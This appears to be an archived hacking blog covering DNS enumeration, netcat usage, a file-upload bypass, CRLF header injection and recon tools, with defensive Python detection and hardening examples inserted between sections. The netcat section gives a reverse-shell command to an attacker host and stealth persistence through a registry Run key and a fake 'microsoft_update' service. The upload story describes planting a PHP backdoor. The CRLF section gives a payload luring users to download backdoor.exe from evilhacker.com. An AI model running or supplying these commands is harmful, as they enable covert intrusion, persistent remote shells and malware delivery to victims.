The site has moved to the root domain, where all posts have been imported. Please go to http://pusheax.com/
Enumeration and vulnerability analysis.
fierce (a really good tool, which can also be used for brute forcing)
host (command), etc.
I have found fierce to be a powerful tool for DNS enumeration and I often use it for that. First the tool checks whether the target's name servers allow a zone transfer. If they do not allow a zone transfer, it starts brute forcing hostnames using the default wordlist that comes with the tool. Believe it or not, most of the time I get very good results from this tool. Try it out yourself please!!!
This tool is written in Perl:
fierce.pl (C) Copywrite 2006,2007 – By RSnake at http://ha.ckers.org/fierce/
Usage: perl fierce.pl [-dns example.com] [OPTIONS]
Fierce is a semi-lightweight scanner that helps locate non-contiguous
IP space and hostnames against specified domains. It’s really meant
as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all
of those require that you already know what IP space you are looking
for. This does not perform exploitation and does not scan the whole
internet indiscriminately. It is meant specifically to locate likely
targets both inside and outside a corporate network. Because it uses
DNS primarily you will often find mis-configured networks that leak
internal address space. That’s especially useful in targeted malware.
-connect Attempt to make http connections to any non RFC1918
(public) addresses. This will output the return headers but
be warned, this could take a long time against a company with
many targets, depending on network/machine lag. I wouldn’t
recommend doing this unless it’s a small company or you have a
lot of free time on your hands (could take hours-days).
Inside the file specified the text “Host:n” will be replaced
by the host specified. Usage:
perl fierce.pl -dns example.com -connect headers.txt
-delay The number of seconds to wait between lookups.
-dns The domain you would like scanned.
-dnsfile Use DNS servers provided by a file (one per line) for
reverse lookups (brute force).
-dnsserver Use a particular DNS server for reverse lookups
(probably should be the DNS server of the target). Fierce
uses your DNS server for the initial SOA query and then uses
the target’s DNS server for all additional queries by default.
-file A file you would like to output to be logged to.
-fulloutput When combined with -connect this will output everything
the webserver sends back, not just the HTTP headers.
-help This screen.
-nopattern Don’t use a search pattern when looking for nearby
hosts. Instead dump everything. This is really noisy but
is useful for finding other domains that spammers might be
using. It will also give you lots of false positives,
especially on large domains.
-range Scan an internal IP range (must be combined with
-dnsserver). Note, that this does not support a pattern
and will simply output anything it finds. Usage:
perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co
-search Search list. When fierce attempts to traverse up and
down ipspace it may encounter other servers within other
domains that may belong to the same company. If you supply a
comma delimited list to fierce it will report anything found.
This is especially useful if the corporate servers are named
different from the public facing website. Usage:
perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany
Note that using search could also greatly expand the number of
hosts found, as it will continue to traverse once it locates
servers that you specified in your search list. The more the
-suppress Suppress all TTY output (when combined with -file).
-tcptimeout Specify a different timeout (default 10 seconds). You
may want to increase this if the DNS server you are querying
is slow or has a lot of network lag.
-threads Specify how many threads to use while scanning (default
is single threaded).
-traverse Specify a number of IPs above and below whatever IP you
have found to look for nearby IPs. Default is 5 above and
below. Traverse will not move into other C blocks.
-version Output the version number.
-wide Scan the entire class C after finding any matching
hostnames in that class C. This generates a lot more traffic
but can uncover a lot more information.
-wordlist Use a seperate wordlist (one word per line). Usage:
perl fierce.pl -dns examplecompany.com -wordlist dictionary.txt
Run: perl fierce.pl -dns yourtarget.net
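What fierce's two phases look like from the other side, as an added example (not code from the post or from fierce): one AXFR attempt, then a burst of lookups under the target domain where most names do not exist. The log format and the sample lines are constructed for this example.

```python
"""Detect fierce-style DNS brute forcing in an authoritative server's query log.

Added example, not code from the post or from fierce. fierce first asks for a
zone transfer (AXFR) and, when refused, queries a wordlist of hostnames under
the target domain. On the server side that is one AXFR attempt followed by a
burst of lookups from one client, most of which answer NXDOMAIN.
The "<client> <qtype> <qname> <rcode>" format below is constructed for this
example; it is not a real BIND or Unbound log format.
"""
from collections import defaultdict

# Constructed sample log: one fierce-like client (10.0.0.5) and one normal one.
SAMPLE_LOG = """\
10.0.0.5 AXFR example.com. REFUSED
10.0.0.5 A www.example.com. NOERROR
10.0.0.5 A mail.example.com. NOERROR
10.0.0.5 A admin.example.com. NXDOMAIN
10.0.0.5 A backup.example.com. NXDOMAIN
10.0.0.5 A dev.example.com. NXDOMAIN
10.0.0.5 A intranet.example.com. NXDOMAIN
10.0.0.5 A vpn.example.com. NXDOMAIN
10.0.0.5 A test.example.com. NXDOMAIN
192.0.2.9 A www.example.com. NOERROR
192.0.2.9 MX example.com. NOERROR
"""

def parse_log(text):
    """Yield (client, qtype, qname, rcode), skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield tuple(parts)

def detect_enumeration(text, domain, min_queries=8, nx_ratio=0.6):
    """Return {client: stats} for clients whose lookups under `domain` look
    like a wordlist run: at least min_queries names tried and more than
    nx_ratio of them NXDOMAIN. An AXFR attempt is recorded as extra evidence."""
    apex = domain.rstrip(".") + "."
    stats = defaultdict(lambda: {"total": 0, "nxdomain": 0, "axfr": False})
    for client, qtype, qname, rcode in parse_log(text):
        if qtype == "AXFR" and qname == apex:
            stats[client]["axfr"] = True
        elif qname.endswith("." + apex):
            stats[client]["total"] += 1
            stats[client]["nxdomain"] += 1 if rcode == "NXDOMAIN" else 0
    return {c: dict(s) for c, s in stats.items()
            if s["total"] >= min_queries and s["nxdomain"] / s["total"] > nx_ratio}
```

Tune min_queries and nx_ratio to your zone: a large zone with many real hosts needs a lower ratio, a small one can use a higher threshold.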
You will find lots of dorks on exploit-db. Hope you will enjoy!!!
Netcat is actually not a hacking tool; it is a networking tool. We can use it to communicate with other computers remotely, transfer data, chat, etc. But we can also use it as a backdoor or a hacking tool. For example, "ping" is not a hacking or DoS tool, but we can DoS using "ping", no? Still, we can't call it a DDoS tool.
Anyway, netcat is often called the "Swiss Army Knife".
I will explain its basic usage now.
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port]
-c shell commands as `-e’; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp-data’).
We can use netcat as a backdoor and for banner grabbing, port scanning, chatting, file transfer, traffic redirection, etc.
Banner Grabbing :
root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<title>400 Bad Request</title>
<p>Your browser sent a request that this server could not understand.<br />
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
sent 16, rcvd 617
How: nc -vvv ip port, then hit Enter twice.
We can simply see that the web server version is Apache 2.2.21 (Win32). Not only that, we can also see the OpenSSL version, PHP version, etc. Do you know how a scanner scans a target for vulnerabilities? The scanner first finds the version of the server/application, then checks it against its local database (for example Nessus, Acunetix, etc.). We can also just search Google for vulnerabilities in that specific version... no?
In the same way we can find the version and other information of other applications:
root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.
You can try to connect to any port except 443, since netcat can't communicate over SSL. Or use tunneling.
Chat with your hacker friend:
Suppose there are two hackers called hacker1 and hacker2. They don't want to get caught using another messenger, or they just want private communication.
How do they do this? A simple command:
-vvv stands for verbose (as much as possible)
-l for listening (opening the port to accept connections)
-p for port (the specific port to listen on)
hacker2 (connecting to hacker1):
nc -vvv 192.168.96.129 4444 (4444 is the port)
Transfer the File:
Hackers do not want to transfer files via public file-sharing servers because of the risk, but they can use netcat to transfer the file.
Suppose hacker1 (blackhat) has a passwords file on his computer (192.168.96.129) and wants to transfer the file to hacker2 (192.168.1.213).
Hacker1's netcat command was:
Hacker2's netcat command was:
nc -vvv 192.168.96.129 port >passwords.txt (port is the port hacker1 is listening on)
Let’s do a port scan using netcat:
We can scan ports with a simple command: nc -vvv -z targetip 1-65535
Here the extra "-z" option selects zero-I/O mode, which is meant for scanning (see the help above).
It is simple to create a backdoor using netcat:
windows server mode:
-L don't die (keep listening after the client disconnects).
-e start the command line.
Linux/Unix server mode:
-k don't die (keep listening after the client disconnects).
-e command mode.
Connect to the server:
How about a reverse connection? Try the following on the victim machine:
nc -e cmd -d attackerip 1337
On your own computer(Attacker):
nc -vv -l -k -p 1337
Now you are thinking: how can a hacker install netcat on the victim's computer... right?
1. They first compromise the target system/server. They want permanent access to the victim machine, so the only way is uploading a backdoor and setting it as a startup application.
2. They create a batch file, shell script or downloader, then send it to the victim (undetected by AV). Whenever the victim clicks on the script/batch file it starts downloading, installing, etc. automatically.
So how do you make netcat a stealth backdoor? The answer is by editing the registry or moving it to the startup folder. Suppose you compromised an IIS web server and uploaded the cmdasp.asp backdoor. Now you want to install netcat as a stealth backdoor for some reason.
Netcat as start up backdoor:
Run this command:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v microsoft_service /t REG_SZ /d "c:\nc.exe -d targetip 1337 -e cmd.exe"
Create a netcat listener on your local computer. Whenever the victim reboots his computer, it will connect back to you.
How about netcat as a service? Try:
sc create microsoft_update binpath= "cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
Now try to make the backdoor connect to you (hint: at).
By the way, you can do much more with netcat. Netcat is not so bad as a backdoor, and if you can edit the netcat C code, it can be a super backdoor.
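The Run-key value and the auto-start service above both leave a command line in a well-known place, which is exactly where a defender looks for them. An added example (not code from the post) that sweeps a constructed autostart inventory for the netcat signature; collecting the real entries (reg query, sc qc, Autoruns) is left to the reader.

```python
"""Audit Windows autostart entries for a netcat-style backdoor.

Added example, not code from the post. The post plants nc.exe through a
Run-key value and through an auto-start service; both leave a command line
in a well-known place, so a defender can sweep those places for the
signature: a netcat binary name plus an exec option (-e/-c) that hands a
shell to the socket, or a persistent listener flag (-l/-L/-k).
The inventory below is constructed to mirror the post's two commands;
collecting real entries (reg query, sc qc, Autoruns) is left to the reader.
"""
import re
import shlex

# Constructed inventory: (where it was found, command line)
AUTOSTART = [
    ("Run\\OneDrive", r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Run\\microsoft_service", r'c:\nc.exe -d 198.51.100.7 1337 -e cmd.exe'),
    ("service microsoft_update", r'cmd /K start c:\nc.exe -d 198.51.100.7 4444 -e cmd.exe'),
    ("service Spooler", r'C:\Windows\System32\spoolsv.exe'),
]

NETCAT_BIN = re.compile(r"(^|[\\/])(nc|nc64|ncat|netcat)(\.exe)?$", re.I)
SHELLS = ("cmd", "cmd.exe", "powershell", "powershell.exe", "sh", "bash", "/bin/sh", "/bin/bash")

def classify(cmdline):
    """Return the reasons a command line looks like a netcat backdoor ([] = clean)."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    except ValueError:
        argv = cmdline.split()
    reasons = []
    for i, tok in enumerate(argv):
        word = tok.strip('"')
        if NETCAT_BIN.search(word):
            reasons.append(f"netcat binary: {word}")
        elif word.lower() in ("-e", "-c") and i + 1 < len(argv):
            nxt = argv[i + 1].strip('"').lower()
            if nxt in SHELLS or nxt.endswith(("\\cmd.exe", "\\powershell.exe")):
                reasons.append(f"shell bound to socket: {word} {nxt}")
        elif word in ("-l", "-L", "-k"):
            reasons.append(f"listener flag {word}")
    return reasons

def audit(entries):
    """Return [(location, reasons)] for every entry with at least one hit."""
    return [(where, classify(cmd)) for where, cmd in entries if classify(cmd)]
```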
More about it:
I did my job very quickly after finding a file upload vulnerability in a website. I was pentesting a network remotely (black-box testing) and it was really hard. I often browsed their website. I was not even able to ping their IP because of the firewall. The only things left for me to do were social engineering and web pentesting (really, I was confused!!! If the SE and web hacking methods did not work then perhaps my heart was about to be attacked!!! lol (my heart is not weak)). Anyway, I scanned the site with various vulnerability scanners... no luck!!! So I started browsing the site manually (and Google searching randomly; truthfully I didn't know what to look for).
Suddenly I found a personal file upload link, which was hell to find, but my Google friend helped me a lot. The link was like: www.hired-me.org/test/personal/re_al/file2010.php. It only accepted 3 file extensions: JPEG, TEXT, CSV. At first I did not think that this link had any vulnerability (already confused by the fucking scanner!!!).
How I exploited it:
First I uploaded a JPEG file and tried to find the location where it was saved. That was also hard (my knowledge sucks?). OK, at least I found the JPEG file was located at www.hired-me.com/index/hidden/director/test.jpeg. Everything okay. Now I quickly created a PHP file [test.php]:
I quickly tried to upload "test.php" and "test.jpeg.php" but got the error "Unknown File Extension". This error made me sure that the file extension was filtered.
Again I renamed "test.php" to "test.php.jpeg". Now no error!!! Wow!!
I quickly checked www.hired-me.com/index/hidden/director/test.php.jpeg and the page displayed "This is test". Then I decided to upload a real PHP backdoor, then uploaded some rooting tools, then created SSH and then compromised two additional machines. Job done!!!
Feedback is welcome!!!
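Why "test.php.jpeg" got through: the site looked only at the final extension, and the usual reason such a file still runs as PHP is Apache's multiple-extension handling, which maps a handler from any extension in the name. An added example (not code from the site in the post) with that weak check beside a hardened one:

```python
"""Upload extension check: the bypassed logic next to a hardened version.

Added example, not code from the site in the post. That site accepted
JPEG/TXT/CSV by looking only at the final extension, so "test.php.jpeg"
passed, and a server that maps handlers by any extension in the name
(Apache's multiple-extension behaviour) still executed it as PHP.
hardened_check() rejects executable extensions anywhere in the name,
allows exactly one extension, checks the content matches the claimed
type, and stores the file under a server-generated name.
"""
import os
import secrets

ALLOWED = {"jpeg": b"\xff\xd8\xff", "jpg": b"\xff\xd8\xff", "txt": None, "csv": None}
EXECUTABLE = {"php", "php3", "php5", "phtml", "phar", "asp", "aspx", "jsp", "cgi", "pl", "sh"}

def weak_check(filename):
    """What the post describes: only the final extension is examined."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED

def hardened_check(filename, content):
    """Return (True, storage_name) or (False, reason)."""
    base = os.path.basename(filename.replace("\\", "/"))   # strip any path part
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension or dotfile"
    exts = parts[1:]
    if any(e in EXECUTABLE for e in exts):
        return False, f"executable extension in name: {base}"
    if len(exts) != 1:
        return False, f"multiple extensions not allowed: {base}"
    ext = exts[0]
    if ext not in ALLOWED:
        return False, f"unknown file extension: {ext}"
    magic = ALLOWED[ext]
    if magic is not None and not content.startswith(magic):
        return False, f"content does not look like {ext}"
    if magic is None and (b"<?" in content or b"\x00" in content):
        return False, "text upload contains script or binary markers"
    # The client-supplied name never reaches the filesystem.
    return True, f"{secrets.token_hex(8)}.{'jpg' if ext == 'jpeg' else ext}"
```

Serving the upload directory with script execution disabled (no handler, or a separate static host) is the second half of the fix; the name check alone only removes the trigger the post used.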
If we can inject a newline into a header we control, then we will be able to insert additional HTTP headers and some nasty body text. I don't think we can compromise a website/server via this vulnerability, but it is still powerful for social engineering attacks, phishing, redirecting to malicious sites, downloading backdoors, virtual defacement, sometimes injecting cookies, etc. It is much like XSS.
Basically this vulnerability is found in the "Set-Cookie" and "Location" headers. If we connect to a website:
If this is the behaviour of the host, then we should try to insert a carriage return and line feed:
If the host is vulnerable then it will reply with an additional line "it-is=vulnerable", like this:
Simply, a hacker can force users to download a backdoor:
Content-Length:+22%0d%0a%0d%0a<html>%0d%0a<a href=www.evilhacker.com/backdoor.exe>Please update first</a>%0d%0a</html>%0d%0aHTTP/1.1
We can also create a fake cookie and send the URL to the poor victim. Just think smartly and you will find some other way 😉
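The same "it-is=vulnerable" probe from the application's side, as an added example (not code from the post): a redirect built by raw concatenation splits into two responses on the wire, while the validated version refuses the value before it reaches the header block.

```python
"""CRLF injection into a Location header: the split, and the fix.

Added example, not code from the post. build_redirect_unsafe() models an
application that copies a user-controlled value straight into the Location
header; count_responses() shows what the wire carries when that value
holds an encoded CR LF: one response becomes two. validate_redirect() is
the fix: refuse any control character in the value and only redirect to
a site-local path or an allow-listed https host.
"""
from urllib.parse import unquote_plus, urlsplit

def build_redirect_unsafe(target):
    """Vulnerable: raw concatenation into the status/header block."""
    return f"HTTP/1.1 302 Found\r\nLocation: {target}\r\nContent-Length: 0\r\n\r\n"

def count_responses(raw):
    """Number of response heads (status lines) a client would see."""
    return raw.count("HTTP/1.1 ")

def validate_redirect(target, allowed_hosts=("www.example.com",)):
    """Return None when `target` is acceptable, otherwise the rejection reason."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return "control characters in redirect target"
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:            # absolute or protocol-relative URL
        if parts.scheme != "https" or parts.netloc not in allowed_hosts:
            return "redirect to unlisted host"
    elif not target.startswith("/"):
        return "relative redirect must be a site-local path"
    return None

def build_redirect_safe(target):
    """Hardened: the value is validated before it reaches the header block."""
    problem = validate_redirect(target)
    if problem:
        raise ValueError(problem)
    return build_redirect_unsafe(target)   # safe only because of the check above

# Constructed attacker value, decoded the way a web framework decodes a query
# parameter; it mirrors the post's "it-is=vulnerable" probe.
INJECTED = unquote_plus("/home%0d%0aSet-Cookie:+it-is=vulnerable%0d%0a%0d%0aHTTP/1.1+200+OK")
```

Most frameworks already reject CR/LF in header values; the allow-list on the redirect target is the part they cannot do for you.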
How to use:
Simply type "./metagoofil.py" in a terminal/Konsole and you will get all the options for using it.
They also give some usage examples, but here is practical usage:
It will start searching and will automatically download the specified files (lol, be aware).
Now try it against your own site for practice.
I don't think we need someone to teach us how to use tools.
Easy, man... so try everything!!!
Goohost is a simple Bash script that searches Google for information about the target website. It searches for IPs, subdomains and email addresses.
/pentest/enumeration/google/goohost# ./goohost.sh -t backtrack-linux.org -m ip -p 10 -v
Type ./goohost for help.